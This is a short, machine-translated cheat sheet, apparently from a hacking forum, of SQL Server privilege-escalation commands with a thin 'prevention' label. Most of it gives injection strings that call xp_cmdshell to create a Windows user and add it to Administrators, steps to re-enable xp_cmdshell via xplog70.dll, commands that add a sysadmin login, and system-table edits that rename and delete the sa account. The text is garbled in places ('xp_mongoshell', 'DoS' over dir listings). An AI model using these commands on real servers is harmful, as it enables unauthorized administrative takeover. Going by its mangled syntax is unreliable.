Commands related to SQL server privilege escalation and Prevention Measures

Commands related to SQL server privilege escalation and Prevention Measures

; Exec master.. xp_cmdshell "Net user name password/Add "--

; Exec master.. xp_cmdshell "net localgroup administrators name/Add "--

ProgramCodeEnable the SQL statement of Shell

Exec sp_addextendedproc xp_cmdshell, @ dllname = 'loglog70. dll'

Determine whether the storage extension exists

Select count (*) from Master. DBO. sysobjects where xtype = 'X' and name = 'xp _ cmdshell'

If the returned result is 1, OK is returned.

Restore xp_mongoshell

Exec master. DBO. addextendedproc 'xp _ Your shell', 'xp log70. dll '; select count (*) from master. DBO. sysobjects where xtype = 'X' and name = 'xp _ Your shell'

If the returned result is 1, OK is returned.

Otherwise, upload xplog7.0.dll.

Exec master. DBO. addextendedproc 'xp _ mongoshell', 'c:/winnt/system32/xplog70.dll'

Block SQL statements of Shell

Sp_dropextendedproc "xp_cmdshell"

DoS:

Dir C :/

Dir D :/

Dir E :/

Net user tsinternetusers password/Add

Net localgroup administrators tsinternetusers/Add

Backup and recovery IPSec

SeCEdit/export/cfg c:/tmp. inf

Echo sedenynetworklogonright => C:/tmp. inf

SeCEdit/configure/db c:/Windows/SeCEdit. sdb/cfg c:/tmp. inf

SQL:

Exec master .. sp_addlogin username, password

Exec master .. SP_ADDSRVROLEMEMBER username, SysAdmin

Sa account name and Deletion

First open the Enterprise Manager in SQL, select SQL Server Configuration attributes in the Tools tab, and click server settings. Can you directly modify the front box of the system directory, click, okay.

Open the query analyzer and log on to the analyzer (haha, whatever account you use, but you must have the db_owner permission in the master database ).

Update sysxlogins set name = 'the name you want to change to 'where SID = 0x01

Update sysxlogins set SID = 0xe765555bd44f054f89cd0076a06ea823 where name = 'name you want to change to name'

OK, the execution is successful, good pull, switch to the Enterprise Manager and refresh the login in security to see if SA is changed to xwq pull. Haha, right-click xwq and choose whether to show the option of pulling and deleting, delete. Check if SA has not been pulled.

Postscript

How to delete SA directly in the query Analyzer

The method of deleting SA directly in the query analyzer is similar to that mentioned above, but this time it is not in the Enterprise Manager, instead, SQL provides us with powerful stored procedures to complete this task. The following describes the Stored Procedure sp_configure and sp_configure to be used to display or change the global configuration settings of the current server.

Its Syntax:

Sp_configure [[@ configname =] 'name']

[, [@ Configvalue =] 'value']

Instance:

Sp_configure 'Allow updates', 1

Go

Reconfigure with override

Go

Good pull, so that we can update the system table pull. Next we will pull the update sysxlogins set name = 'you want to change to the name 'where SID = 0x01, then Delete "the name you renamed"

However, note that the execution permission without parameters (or only the first parameter) on sp_configure is granted to all users by default. Execution permission of sp_configure with two parameters (used to change configuration options) is granted to SysAdmin and serveradmin fixed server roles by default. Reconfigure permissions are granted by default to SysAdmin fixed server roles and serveradmin fixed server roles, and cannot be transferred. It must also be db_owner in the master.